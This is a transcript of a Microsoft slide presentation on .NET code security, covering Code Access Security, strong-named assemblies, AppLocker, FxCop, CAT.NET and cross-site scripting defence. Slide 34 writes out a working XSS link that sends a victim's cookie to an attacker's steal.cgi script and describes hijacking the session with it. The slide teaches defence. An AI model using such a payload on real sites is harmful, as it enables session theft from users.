1 / 40

.NET Code security including 4.0 & Tools

.NET Code security including 4.0 & Tools. Jon C. Arce Jonarce@microsoft.com. Agenda. Available Tools .NET Code Access Security FxCop CAT.NET . NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET Web Applications

tress
Télécharger la présentation

.NET Code security including 4.0 & Tools

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. .NET Code securityincluding 4.0 & Tools Jon C. Arce Jonarce@microsoft.com

  2. Agenda • Available Tools • .NET Code Access Security • FxCop • CAT.NET • .NET Framework Security Features • Code Access Security • Role-Based Security • Cryptography • Securing ASP.NET Web Applications • Securing ASP.NET Web Services

  3. .NET Code Access Security (CAS) Policy • Code Access Security (CAS) is the .NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code. • You need to sign the code, to add EXTERNAL configuration security to the application.

  4. Strong-Named Assemblies • Strong names are • Unique identifiers (containing a public key) • Used to digitally sign assemblies • Strong-named assemblies • Prevent tampering • Confirm the identity of the assembly’s publisher • Allow side-by-side components • sn –k MyFullKey.snk

  5. Evidence-Based Security • Evidence • Is assessed when an assembly is loaded • Is used to determine the permissions for the assembly • Can include the assembly’s: • Strong name information • URL • Zone • Authenticode signature

  6. Security Policies (up to .NET 2.0)

  7. Permission Sets

  8. Types of Security Checks • Imperative security checks • Create Permission objects • Call Permission methods • Declarative security checks • Use Permission attributes • Apply to methods or classes • Overriding security checks • Use the Assert method • Prevent the stack walk

  9. Call to ReadFile Call to ReadFile Security Check Stack Walks 1. An assembly requests access to a method in your assembly 2. Your assembly passes the request to a .NET Framework assembly 3. The security system ensures that all callers in the stack have the required permissions 4. The security system grants access or throws an exception Call Stack SomeAssembly Grant: Execute YourAssembly Grant: ReadFile Permission Demand Security System .NET Framework Assembly Security exceptionAccess denied Grant access? Grant: ReadFile

  10. Permission Requests • Used by developers to state required permissions • Implemented by attributes • Prevents an assembly from loading when minimum permissions are not available //I will only run if I can call unmanaged code [assembly:SecurityPermission (SecurityAction.RequestMinimum, UnmanagedCode=true)]

  11. Create a code group • Control Panel

  12. Specify Membership Condition • Specify Membership Condition

  13. Select a permission set

  14. Naming the permission set

  15. Assign permission sets

  16. Setting File I/O permissions

  17. Completing Code Group Creation

  18. Security Policy in the v4 CLR • In previous releases of the .NET Framework, CAS policy applied to all assemblies loaded into an application • the major areas that are seeing updates with the v4 CLR are:  • Security policy • Security transparency • APTCA (AllowPartiallyTrustedCallersAttribute) • Evidence • AppDomain Managers • http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0-security.aspx

  19. Sandboxing Privileged Code Permissions Demanded then Asserted AllowPartiallyTrustedCallers attribute added Assembly installed into the global assembly cache Resource Access Secured Resource Partial Trust Web Application Wrapper Assembly Sandboxed Code <trust level_”Medium” originUri_--/>

  20. Evidence Types

  21. AppDomain Managers • In .NET, the basic unit of execution is NOT the process, rather it is that of the Application Domain. • With AppDomains, multiple applications can run in the same process, thereby sharing the .NET runtime libraries. • HostSecurityManager class apply policy and permissions. This technique determines the security for the entire AppDomain at once.

  22. Software Restriction Policy • You can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site. • Control the ability of software to run on your system. • Permit users to run only specific files on multiuser computers. • Control whether software restriction policies affect all users or just certain users on a computer. • Cancel an application to run (virus)

  23. New Software Restriction Policies

  24. 1. Sign the application

  25. 2. Set the publisher • Publish -> Options

  26. Windows Application Locker • AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. • If you use AppLocker, you can create rules to allow or deny applications from running like: • executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx)

  27. Isolated Storage • Provides a virtual file system • Allows quotas • Implements file system isolation based on: • Application identity • User identity • IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForAssembly();

  28. TOOLS to Help with security

  29. FXCop • FxCop is a code analysis tool that checks .NET managed code assemblies for conformance to the Microsoft .NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: • Library design • Globalization • Naming conventions • Performance • Interoperability and portability • Security • Usage

  30. FxCop demo

  31. Microsoft Code Analysis Tool .NET • CAT.NET is a static code analysis tool like fxCop but specially built for managed code and with a strong focus on security vulnerabilities. • CAT.NET scans manage code for specific security vulnerabilities like: • SQL injection • LDAP injection • Cross Site Scripting • XPATH injection • and many other categories of vulnarabilities.

  32. CAT.NET demo

  33. Cross Site Scripting • XSS stands for Cross Site Scripting, an XSS attack is when an attacker manages to inject Java script code or sometimes other code (usually Java Script) into a website causing it to execute the code. • if an attacker made a specially crafted link and sent it to an unsuspecting victim and that victim clicked the link and a piece of Java Script code could be executed which would send the victims cookie away to a CGI Script • Cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities as of 2007

  34. XSS Attack ! • Sendthe victim and email, with the following HTML: <AHREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<script>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+document.cookie);</script>">Check this Article Out! </a> • The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has theusers cookie. • Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself.

  35. Microsoft Anti-Cross Site Scripting Library V3.0 • The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. • It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks. • http://www.microsoft.com/downloads/details.aspx?familyid=051EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en

  36. Session Summary • .NET Framework Security Features • Code Access Security • Role-Based Security • Cryptography • Securing ASP.NET Web Applications • Securing ASP.NET Web Services

  37. Next Steps • Stay informed about security • Sign up for security bulletins: http://www.microsoft.com/security/security_bulletins/alerts2.asp • Get the latest Microsoft security guidance: http://www.microsoft.com/security/guidance/ • Get additional security training • Find online and in-person training seminars: http://www.microsoft.com/seminar/events/security.mspx • Find a local CTEC for hands-on training: http://www.microsoft.com/learning/

  38. For More Information • Microsoft Security Site (all audiences) • http://www.microsoft.com/security • MSDN Security Site (developers) • http://msdn.microsoft.com/security • TechNet Security Site (IT professionals) • http://www.microsoft.com/technet/security

  39. Questions and Answers

More Related